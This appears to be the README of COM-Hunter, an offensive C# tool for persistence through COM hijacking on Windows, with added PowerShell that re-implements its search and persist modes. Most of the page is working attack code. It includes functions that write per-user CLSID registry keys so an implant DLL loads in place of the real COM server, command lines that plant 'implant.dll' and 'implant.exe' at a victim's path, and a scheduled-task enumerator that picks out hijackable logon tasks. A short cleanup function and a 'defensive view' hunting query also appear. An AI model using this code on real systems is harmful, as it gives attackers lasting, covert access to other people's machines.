COM Hijacking VOODOO
COM-Hunter is a COM Hijacking persistence tool written in C#.
The following list explains the available modes:
- Search Mode: Searches for CLSIDs based on InprocServer32, LocalServer32, and the registry hives HKLM and HKCU.
- Classic Persist Mode: Performs classic COM hijacking persistence using LocalServer32 or InprocServer32.
- Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using LocalServer32 or InprocServer32.
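As an added illustration of what search mode and classic persist mode do under the hood, the following PowerShell was written for this page; it is not COM-Hunter's C# source. It assumes the CLSIDs used in the examples below and a placeholder implant path (C:\Users\victim\Desktop\implant.dll) that you supply yourself; the DLL must export DllGetClassObject for InprocServer32 to be usable.

```powershell
# Added example, not COM-Hunter's code. Assumptions: CLSID strings may be given with
# or without braces; $BinaryPath points at an implant that already exists on disk.

function ConvertTo-Clsid {
    # Accept "01575CFE-..." or "{01575CFE-...}" and return the braced, upper-case form
    # used as the registry key name under Software\Classes\CLSID.
    param([Parameter(Mandatory)][string]$Clsid)
    $g = [guid]::Empty
    if (-not [guid]::TryParse($Clsid.Trim('{', '}'), [ref]$g)) {
        throw "Not a valid CLSID: $Clsid"
    }
    return '{' + $g.ToString().ToUpperInvariant() + '}'
}

function Find-ComServer {
    # Search mode: report the InprocServer32 (DLL) / LocalServer32 (EXE) entries
    # registered for one CLSID in HKLM and/or HKCU.
    param(
        [Parameter(Mandatory)][string]$Clsid,
        [ValidateSet('InprocServer32', 'LocalServer32')][string[]]$ServerType = @('InprocServer32', 'LocalServer32'),
        [ValidateSet('HKLM', 'HKCU')][string[]]$Hive = @('HKLM', 'HKCU')
    )
    $id = ConvertTo-Clsid $Clsid
    foreach ($h in $Hive) {
        foreach ($t in $ServerType) {
            $key = "${h}:\Software\Classes\CLSID\$id\$t"
            if (Test-Path -LiteralPath $key) {
                $v = Get-ItemProperty -LiteralPath $key
                [pscustomobject]@{
                    Hive           = $h
                    Clsid          = $id
                    ServerType     = $t
                    Path           = $v.'(default)'
                    ThreadingModel = $v.ThreadingModel
                }
            }
        }
    }
}

function Test-ComHijackCandidate {
    # The classic target is a CLSID that has an HKLM server but no HKCU key:
    # a medium-integrity process consults HKCU\Software\Classes first, so a
    # per-user entry shadows the real server without touching HKLM.
    param([Parameter(Mandatory)][string]$Clsid)
    $hits   = @(Find-ComServer -Clsid $Clsid)
    $inHklm = [bool]($hits | Where-Object Hive -eq 'HKLM')
    $inHkcu = [bool]($hits | Where-Object Hive -eq 'HKCU')
    [pscustomobject]@{
        Clsid            = (ConvertTo-Clsid $Clsid)
        RegisteredInHKLM = $inHklm
        AlreadyInHKCU    = $inHkcu
        Hijackable       = ($inHklm -and -not $inHkcu)
    }
}

function Set-ComHijack {
    # Classic persist mode: create the per-user key that shadows the HKLM server.
    param(
        [Parameter(Mandatory)][string]$Clsid,
        [Parameter(Mandatory)][string]$BinaryPath,
        [ValidateSet('InprocServer32', 'LocalServer32')][string]$ServerType = 'InprocServer32'
    )
    $id  = ConvertTo-Clsid $Clsid
    $key = "HKCU:\Software\Classes\CLSID\$id\$ServerType"
    New-Item -Path $key -Force | Out-Null            # -Force creates the parent keys
    Set-ItemProperty -LiteralPath $key -Name '(default)' -Value $BinaryPath
    if ($ServerType -eq 'InprocServer32') {
        # Most hosts refuse to load an in-proc server that has no ThreadingModel.
        Set-ItemProperty -LiteralPath $key -Name 'ThreadingModel' -Value 'Both'
    }
    Find-ComServer -Clsid $id -Hive HKCU -ServerType $ServerType
}

function Remove-ComHijack {
    # Cleanup: deleting the HKCU CLSID key restores the HKLM server.
    param([Parameter(Mandatory)][string]$Clsid)
    $id = ConvertTo-Clsid $Clsid
    Remove-Item -LiteralPath "HKCU:\Software\Classes\CLSID\$id" -Recurse -Force -ErrorAction SilentlyContinue
}

# Usage (same CLSIDs as the examples further down):
Test-ComHijackCandidate '01575CFE-9A55-4003-A5E1-F38D1EBDCBE1'
Set-ComHijack -Clsid '{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}' -BinaryPath 'C:\Users\victim\Desktop\implant.dll'
```

Two caveats worth checking before relying on a CLSID: elevated (high-integrity) processes ignore per-user COM registrations, so the hijack only fires in processes running at medium integrity as the user whose hive was modified; and the shadowed server disappears for that user, so a CLSID that a visible application depends on will break that application and draw attention. Running Find-ComServer after Set-ComHijack shows the HKCU entry next to the untouched HKLM one, which is exactly what a defender comparing the two hives would look for.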
This project was created with ❤️ by @nickvourd && @S1ckB0y1337
ℹ️ Inspired by the RTO course from @zeropointsecltd.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 2.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <options>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
ℹ️ Search DLL and EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Search EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Perform classic persistence using DLL implementation:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Perform classic persistence using EXE implementation:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Perform persistence via Task Scheduler using DLL implementation:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
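Task Scheduler mode relies on scheduled tasks whose action is a COM handler rather than a command line: the task XML names a CLSID, and if that CLSID has no per-user registration, an HKCU entry created by the user will be the one the task loads. The enumeration below was added for this page (PowerShell, not COM-Hunter's C#) to show how such tasks are found and which of them are usable; it assumes the built-in Schedule.Service COM API and the standard task XML layout, and emits the same HKLM/HKCU state that search mode reports.

```powershell
# Added example, not COM-Hunter's code. Assumption: run as the user whose HKCU hive
# the hijack would live in; no task is modified, the script only reads.

function Get-ComHandlerTask {
    # Walk every task folder (hidden tasks included) and emit one record per
    # ComHandler action, together with the registry state of the CLSID it activates.
    $svc = New-Object -ComObject 'Schedule.Service'
    $svc.Connect()
    $pending = New-Object System.Collections.Queue
    $pending.Enqueue($svc.GetFolder('\'))
    while ($pending.Count -gt 0) {
        $folder = $pending.Dequeue()
        foreach ($sub in $folder.GetFolders(0)) { $pending.Enqueue($sub) }
        foreach ($task in $folder.GetTasks(1)) {            # 1 = TASK_ENUM_HIDDEN
            [xml]$xml = $task.Xml
            $handlers = @($xml.Task.Actions.ComHandler) | Where-Object { $_ }
            if (-not $handlers) { continue }               # Exec/email/message actions are not interesting here
            $triggers  = @($xml.Task.Triggers.ChildNodes | ForEach-Object { $_.LocalName }) -join ','
            $principal = $xml.Task.Principals.Principal
            $runAs     = if ($principal.UserId) { $principal.UserId } else { $principal.GroupId }
            foreach ($h in $handlers) {
                $clsid   = ('{' + $h.ClassId.Trim('{', '}') + '}').ToUpperInvariant()
                $hklmKey = "HKLM:\Software\Classes\CLSID\$clsid\InprocServer32"
                $inHklm  = Test-Path -LiteralPath $hklmKey
                $inHkcu  = Test-Path -LiteralPath "HKCU:\Software\Classes\CLSID\$clsid"
                $hklmDll = if ($inHklm) { (Get-ItemProperty -LiteralPath $hklmKey).'(default)' } else { $null }
                [pscustomobject]@{
                    Task       = $task.Path
                    Enabled    = $task.Enabled
                    Triggers   = $triggers
                    RunAs      = $runAs
                    RunLevel   = $principal.RunLevel
                    Clsid      = $clsid
                    HklmServer = $hklmDll
                    InHKCU     = $inHkcu
                    # Usable only if the task is live, a real server exists to shadow,
                    # and nobody (including a previous run of this technique) has
                    # already claimed the per-user key.
                    Hijackable = ($task.Enabled -and $inHklm -and -not $inHkcu)
                }
            }
        }
    }
}

# Offensive view: tasks that fire at logon as the interactive user, without elevation.
Get-ComHandlerTask |
    Where-Object { $_.Hijackable -and $_.Triggers -match 'Logon' -and $_.RunLevel -ne 'HighestAvailable' } |
    Format-Table Task, Triggers, RunAs, Clsid, HklmServer -AutoSize

# Defensive view: handler CLSIDs that already carry a per-user override (rare on a clean host).
Get-ComHandlerTask | Where-Object InHKCU | Format-Table Task, Clsid, HklmServer -AutoSize
```

The RunAs and RunLevel columns matter as much as the trigger: a task that runs as SYSTEM reads a different hive, and one that runs with RunLevel HighestAvailable runs elevated and ignores per-user COM registrations, so neither will ever load the HKCU server. The second query is the same data read the other way round and is a cheap hunt for this technique on hosts you are defending.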
- Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec
- Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS
- Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
- COM Objects Hijacking by VirusTotal